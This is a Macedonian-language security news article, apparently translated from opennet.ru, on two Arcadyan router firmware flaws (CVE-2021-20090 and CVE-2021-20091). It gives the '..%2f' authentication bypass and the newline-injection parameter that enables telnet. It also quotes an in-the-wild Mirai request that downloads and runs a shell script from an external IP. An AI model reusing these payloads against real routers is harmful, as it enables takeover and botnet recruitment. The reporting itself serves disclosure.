🥇Ранливост кај домашните рутери опфаќа 17 производители

Масовен напад е снимен на мрежата против домашни рутери чиј фирмвер користи имплементација на HTTP сервер од компанијата Arcadyan. За да се добие контрола над уредите, се користи комбинација од две пропусти што овозможува далечинско извршување на произволен код со права на root. Проблемот влијае на прилично широк опсег на ADSL рутери од Arcadyan, ASUS и Buffalo, како и уредите испорачани под брендовите Beeline (проблемот е потврден во Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone и други телекомуникациски оператори. Забележано е дека проблемот е присутен во фирмверот Arcadyan повеќе од 10 години и за ова време успеал да мигрира на најмалку 20 модели на уреди од 17 различни производители.

Првата ранливост, CVE-2021-20090, овозможува пристап до која било скрипта за веб-интерфејс без автентикација. Суштината на ранливоста е дека во веб-интерфејсот, некои директориуми преку кои се испраќаат слики, CSS-датотеки и JavaScript скрипти се достапни без автентикација. Во овој случај, директориумите за кои е дозволен пристап без автентикација се проверуваат со помош на почетната маска. Одредувањето на знаците „../“ во патеките за одење до родителскиот директориум е блокирано од фирмверот, но користењето на комбинацијата „..%2f“ е прескокнато. Така, можно е да се отвораат заштитени страници кога се испраќаат барања како „http://192.168.1.1/images/..%2findex.htm“.

Втората ранливост, CVE-2021-20091, му овозможува на автентицираниот корисник да прави промени во системските поставки на уредот со испраќање специјално форматирани параметри до скриптата apply_abstract.cgi, која не проверува присуство на знак од нова линија во параметрите . На пример, кога врши операција за пинг, напаѓачот може да ја наведе вредноста „192.168.1.2%0AARC_SYS_TelnetdEnable=1“ во полето со IP адресата што се проверува и скриптата, при креирањето на датотеката за поставки /tmp/etc/config/ .glbcfg, ќе ја напише линијата “AARC_SYS_TelnetdEnable=1” во неа “, која го активира телнет серверот, кој обезбедува неограничен пристап на командната школка со права на root. Слично на тоа, со поставување на параметарот AARC_SYS, можете да извршите кој било код на системот. Првата ранливост овозможува да се изврши проблематична скрипта без автентикација со пристап до неа како „/images/..%2fapply_abstract.cgi“.

За да ги искористи пропустите, напаѓачот мора да може да испрати барање до мрежната порта на која работи веб-интерфејсот. Судејќи според динамиката на ширењето на нападот, многу оператори оставаат пристап до нивните уреди од надворешната мрежа за да ја поедностават дијагнозата на проблемите од страна на службата за поддршка. Ако пристапот до интерфејсот е ограничен само на внатрешната мрежа, може да се изврши напад од надворешна мрежа користејќи ја техниката „DNS rebinding“. Пропустите веќе активно се користат за поврзување на рутери со ботнетот Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Поврзување: затворете го Кориснички агент: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D_5. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1& %0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

Извор: opennet.ru

Ранливост кај домашните рутери што влијае на 17 производители

Додадете коментар Откажи одговор